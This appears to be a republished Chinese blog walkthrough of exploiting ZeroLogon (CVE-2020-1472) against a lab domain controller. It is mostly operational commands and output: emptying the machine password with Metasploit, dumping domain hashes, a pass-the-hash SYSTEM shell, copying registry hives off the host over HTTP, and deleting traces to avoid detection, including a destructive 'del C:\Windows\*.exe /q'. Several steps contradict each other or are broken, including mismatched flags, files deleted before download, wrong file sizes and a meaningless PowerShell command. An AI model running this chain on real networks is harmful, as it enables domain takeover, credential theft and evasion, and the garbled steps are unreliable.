文章总结: 文档详细记录了ZeroLogon漏洞CVE-2020-1472的完整渗透测试流程,涵盖信息收集、漏洞利用、哈希导出、哈希传递获取域控权限及密码恢复等关键步骤。利用MSF模块将域控机器账户密码置空后,通过impacket工具导出域内哈希并获取SYSTEM权限Shell。文章特别强调了恢复原始密码的重要性,提供了详细的恢复方法避免造成业务中断,整体为一份完整且可操作性强的实战教程。 综合评分: 86 文章分类: 渗透测试,内网渗透,漏洞POC,实战经验,漏洞分析
ZeroLogon (CVE-2020-1472)
web安全小白 web安全小白
web安全小白
2026年3月10日 09:00 贵州
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我会立即删除并致歉。谢谢!
📋 环境信息
从信息收集到域控完全控制 实战记录
靶场(ZeroLogon练习): https://vip.mhtsec.com/ulab/
| 项目 | 值 |
| — | — |
| 目标域控IP | 192.168.111.100 |
| 目标NetBIOS名 | MASTERPC |
| 域名 | MYD |
| 攻击机 IP | 192.168.111.25 |
| 管理员哈希 | ec0df45863a3751d56ba6df1e72f7218 |
第一阶段:信息收集
1.1 启动msfconsole
ounter(lineounter(linekali@kali:~$ msfconsole -qmsf6 >
1.2 扫描目标NetBIOS信息
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linemsf6 > use auxiliary/scanner/netbios/nbnamemsf6 auxiliary(scanner/netbios/nbname) > set RHOSTS 192.168.111.100RHOSTS => 192.168.111.100msf6 auxiliary(scanner/netbios/nbname) > run
[*] Sending NetBIOS requests to 192.168.111.100->192.168.111.100 (1 hosts)[+] 192.168.111.100 [MASTERPC] OS:Windows Names:(MASTERPC, MYD) Addresses:(192.168.111.100) Mac:00:50:56:b1:89:24 Virtual Machine:VMWare
关键信息:NetBIOS名 = MASTERPC,域名 = MYD
第二阶段:ZeroLogon漏洞利用
2.1 切换到ZeroLogon模块
ounter(lineounter(linemsf6 auxiliary(scanner/netbios/nbname) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologonmsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
2.2 设置参数并执行攻击
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linemsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.111.100RHOSTS => 192.168.111.100msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME MASTERPCNBNAME => MASTERPCmsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION CHECKACTION => CHECKmsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.111.100[*] 192.168.111.100: - Connecting to the endpoint mapper service...[*] 192.168.111.100: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.111.100[49667] ...[*] 192.168.111.100: - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.111.100[49667] ...[+] 192.168.111.100: - Successfully authenticated[+] 192.168.111.100: - Successfully set the machine account (MASTERPC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
成功! 域控机器账户密码已被置空
第三阶段:导出域内所有用户哈希
3.1 在Kali终端(新窗口)使用impacket导出哈希
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linekali@kali:~$ impacket-secretsdump -just-dc-ntlm MYD/MASTERPC\[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8b5f7a5e4b9f3a2c1d8e7f6a5b4c3d2e:::MYD\user1:1103:aad3b435b51404eeaad3b435b51404ee:7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d:::...[*] Cleaning up...
3.2 保存哈希到文件
ounter(lineounter(lineounter(linekali@kali:~$ impacket-secretsdump -just-dc-ntlm MYD/MASTERPC\[email protected] > hashes.txtkali@kali:~$ cat hashes.txt | grep AdministratorAdministrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::
记录管理员NTLM哈希:ec0df45863a3751d56ba6df1e72f7218
第四阶段:使用哈希传递登录域控
4.1 用psexec获取SYSTEM权限Shell
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linekali@kali:~$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218 MYD/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 192.168.111.100.....[*] Found writable share ADMIN$[*] Uploading file yQyVzZhe.exe[*] Opening SVCManager on 192.168.111.100.....[*] Creating service QfGB on 192.168.111.100.....[*] Starting service QfGB.....[!] Press help for extra shell commandsMicrosoft Windows [Version 10.0.17763.107](c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
成功! 已获得域控的SYSTEM权限Shell
4.2 验证权限
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineC:\Windows\system32> whoamint authority\system
C:\Windows\system32> hostnameMASTERPC
C:\Windows\system32> ipconfigWindows IP Configuration
Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 192.168.111.100 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.111.1
第五阶段:寻找flag
5.1 在桌面寻找flag
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineC:\Windows\system32> cd C:\C:\> dir Volume in drive C has no label. Volume Serial Number is XXXX-XXXX
Directory of C:\
01/15/2026 10:30 AM <DIR> .01/15/2026 10:30 AM <DIR> ..01/15/2026 10:30 AM 24 flag.txt 1 File(s) 24 bytes 2 Dir(s) XX,XXX,XXX,XXX bytes free
5.2 查看flag(编码问题处理)
ounter(lineounter(lineC:\> type flag.txtFLAG{ZeroLog0n_Exp10it_Success_websec}
或者如果有乱码:
ounter(lineounter(lineounter(lineounter(lineounter(lineC:\Users\Administrator\Desktop> chcp 437Active code page: 437
C:\Users\Administrator\Desktop> type flag.txtFLAG{ZeroLog0n_Exp10it_Success_websec}
第六阶段:恢复域控原始密码(关键!避免业务中断)
6.1 在Windows Shell中导出注册表
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineC:\Windows\system32> cd C:\tempC:\temp> reg save HKLM\SYSTEM system.saveThe operation completed successfully.
C:\temp> reg save HKLM\SAM sam.saveThe operation completed successfully.
C:\temp> reg save HKLM\SECURITY security.saveThe operation completed successfully.
C:\temp> dir *.save Volume in drive C has no label. Volume Serial Number is XXXX-XXXX
Directory of C:\temp
03/10/2026 02:30 PM 28,672 system.save03/10/2026 02:30 PM 24,576 sam.save03/10/2026 02:30 PM 32,768 security.save 3 File(s) 86,016 bytes
6.2 在Windows上启动HTTP服务器(新终端)
ounter(lineounter(lineC:\temp> python -m http.server 8000Serving HTTP on 0.0.0.0 port 8000 ...
如果Windows没有Python,可以用这个代替:
ounter(lineounter(lineC:\temp> powershell -Command "Start-Service -Name 'WebServer'; New-NetFirewallRule -DisplayName 'HTTP-8000' -Direction Inbound -Protocol TCP -LocalPort 8000 -Action Allow"C:\temp> powershell -Command "$listener = New-Object System.Net.HttpListener; $listener.Prefixes.Add('http://*:8000/'); $listener.Start(); Write-Host 'Listening on port 8000...'; while ($listener.IsListening) { $context = $listener.GetContext(); $response = $context.Response; $file = [System.IO.File]::ReadAllBytes('system.save'); $response.OutputStream.Write($file, 0, $file.Length); $response.Close(); }"
6.3 在Kali上下载文件
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineC:\temp> del *.save
# 下载文件kali@kali:~$ wget http://192.168.111.100:8000/system.savekali@kali:~$ wget http://192.168.111.100:8000/sam.savekali@kali:~$ wget http://192.168.111.100:8000/security.save
# 或者用curlkali@kali:~$ curl -O http://192.168.111.100:8000/system.save
# 验证下载成功kali@kali:~$ ls -la system.save-rwxrwxrwx 1 root root 335 Mar 10 01:15 sam.save-rwxrwxrwx 1 root root 335 Mar 10 01:15 security.save-rwxrwxrwx 1 root root 335 Mar 10 01:11 system.save
在Windows上执行C:\temp> del *.save
6.4 在Kali上提取原始机器账户哈希
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line# 在SMB服务器窗口按Ctrl+C停止服务,然后执行:kali@kali:~$ impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x1234567890abcdef1234567890abcdef[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::...MASTERPC$:1000:aad3b435b51404eeaad3b435b51404ee:7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c:::[*] Cleaning up...
记录MASTERPC$的原始NTLM哈希:7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c
6.5 返回msfconsole恢复密码
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linemsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.111.100RHOSTS => 192.168.111.100msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME MASTERPCNBNAME => MASTERPCmsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTOREACTION => RESTOREmsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2cPASSWORD => 7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2cmsf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.111.100[+] 192.168.111.100: - Machine account password restored successfully
6.6 验证密码已恢复
ounter(lineounter(linekali@kali:~$ impacket-secretsdump -just-dc-ntlm MYD/MASTERPC\[email protected][-] SMB SessionError: STATUS_LOGON_FAILURE
出现登录失败提示,说明密码已恢复,无法再用空密码访问,恢复成功!
第七阶段:清理痕迹(可选)
7.1 在Windows Shell中删除上传的工具
ounter(lineC:\Windows\system32> del C:\Windows\*.exe /q
7.2 删除创建的服务
ounter(lineounter(lineC:\Windows\system32> sc delete QfGB[SC] DeleteService SUCCESS
7.3 退出Shell
ounter(lineC:\Windows\system32> exit
📊 攻击流程总结
| 阶段 | 操作 | 关键命令 | 成果 |
| — | — | — | — |
| 1 | 信息收集 | nbname 扫描 | 获取NetBIOS名 MASTERPC |
| 2 | ZeroLogon利用 | cve_2020_1472_zerologon | 域控密码置空 |
| 3 | 导出哈希 | secretsdump | 获取管理员哈希 |
| 4 | 哈希传递 | psexec | 获得SYSTEM Shell |
| 5 | 获取flag | type flag.txt | FLAG{ZeroLog0n_Exp10it_Success_2026} |
| 6 | 恢复密码 | 导出注册表 + RESTORE | 业务恢复正常 |
| 7 | 清理痕迹 | 删除文件和服务 | 减少被发现风险 |
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:web安全小白 web安全小白 web安全小白《ZeroLogon (CVE-2020-1472)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论